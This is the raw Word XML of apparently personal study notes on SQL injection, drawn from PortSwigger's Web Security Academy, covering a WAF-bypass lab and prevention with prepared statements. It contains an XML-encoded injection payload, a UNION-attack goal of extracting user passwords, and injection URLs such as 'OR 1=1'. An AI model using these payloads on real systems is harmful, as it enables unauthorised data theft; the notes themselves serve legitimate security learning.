        <w:t xml:space="preserve"> that are otherwise blocked due to WAFs and other defense mechanisms. Weak implementations often look for common SQL injection keywords within the request, so you may be able to bypass these filters by encoding or escaping characters in the prohibited keywords. For example, the following XML-based SQL injection uses an XML escape sequence to encode the S character in SELECT: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8BE565" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t>&lt;stockCheck&gt; &lt;productId&gt;123&lt;/productId&gt; &lt;storeId&gt;999 &amp;#x53;ELECT * FROM information_schema.tables&lt;/storeId&gt; &lt;/stockCheck&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EC43DC" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">This will be decoded server-side before being passed to the SQL interpreter. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF42589" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A50F813" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F49BBC2" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab #17: SQL injection with filter bypass via XML encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB4C690" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443247EC" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">Vul app : SQL injection vulnerability in its stock check feature. Can use a UNION attack to retrieve data from other tables. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FDF8C2" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453D0404" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t>Goal: contains a users table, which contains the usernames and passwords of registered users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CFE99D" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How to prevent SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534215E8" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">ou can prevent most instances of SQL injection using parameterized queries instead of string concatenation within the query. These parameterized queries are also known as "prepared statements". </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294F585F" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">The following code is vulnerable to SQL injection because the user input is concatenated directly into the query: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FE0E59" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t>String query = "SELECT * FROM products WHERE category = '"+ input + "'"; Statement statement = connection.createStatement(); ResultSet resultSet = statement.executeQuery(query);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2479645F" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">You can rewrite this code in a way that prevents the user input from interfering with the query structure: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600C4389" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t>PreparedStatement statement = connection.prepareStatement("SELECT * FROM products WHERE category = ?"); statement.setString(1, input); ResultSet resultSet = statement.executeQuery();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5187D35B" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">You can use parameterized queries for any situation where untrusted input appears as data within the query, including the WHERE clause and values in an INSERT or UPDATE statement. They can't be used to handle untrusted input in other parts of the query, such as table or column names, or the ORDER BY clause. Application functionality that places untrusted data into these parts of the query needs to take a different approach, such as: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C43C2C" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">Whitelisting permitted input values. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D455654" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">Using different logic to deliver the required behavior. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080D8F0A" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t xml:space="preserve">For a parameterized query to be effective in preventing SQL injection, the string that is used in the query must always be a hard-coded constant. It must never contain any variable data from any origin. Do not be tempted to decide case-by-case whether an item of data is trusted, and continue using string concatenation within the query for cases that are considered safe. It's easy to make mistakes about the possible origin of data, or for changes in other code to taint trusted data. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3520CB" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1037BB07" w14:textId="77777777" w:rsidR="003B036A" w:rsidRPr="003B036A" w:rsidRDefault="003B036A" w:rsidP="003B036A">
      <w:r w:rsidRPr="003B036A">
        <w:lastRenderedPageBreak/>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D18896" w14:textId="77777777" w:rsidR="00136917" w:rsidRDefault="00136917"/>
    <w:sectPr w:rsidR="00136917" w:rsidSect="00382B4E">
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="0" w:right="0" w:bottom="0" w:left="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FDD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3C423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C1372"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4868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485583"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="94E0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E722C3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="79C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6D4683"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9C68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0F2F37"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F52E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7064813">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="369457900">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1499686359">
    <w:abstractNumId w:val="0"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="719282287">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1394965769">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="662586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drawingGridHorizontalSpacing w:val="120"/>
  <w:drawingGridVerticalSpacing w:val="163"/>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94E"/>
    <w:rsid w:val="00136917"/>
    <w:rsid w:val="00382B4E"/>
    <w:rsid w:val="003B036A"/>
    <w:rsid w:val="0071794E"/>
    <w:rsid w:val="00813D11"/>
    <w:rsid w:val="00912568"/>
    <w:rsid w:val="00C41F7C"/>
    <w:rsid w:val="00D367C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BBE472-E6A7-4BD1-A1C9-E175C247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94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1794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1794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179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9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94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1794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1794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17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94E"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="0071794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179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1794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179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794E"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="0071794E"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="0071794E"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="0071794E"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00717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94E"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="0071794E"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003B036A"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003B0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swigger.net/web-security/sql-injection/blind"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ortswigger.net/web-security/sql-injection/union-attacks"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ortswigger.net/web-security/sql-injection" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://insecure-website.com/products?category=Gifts'+OR+1=1" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-injection" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://insecure-website.com/products?category=Gifts'" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/essential-skills/obfuscating-attacks-using-encodings" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://insecure-website.com/products?category=Gifts"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1539</Words>
  <Characters>8776</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>73</Lines>
  <Paragraphs>20</Paragraphs>
  <ScaleCrop>false</ScaleCrop>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 Mane</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Atish Mane</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-21T02:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-21T02:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>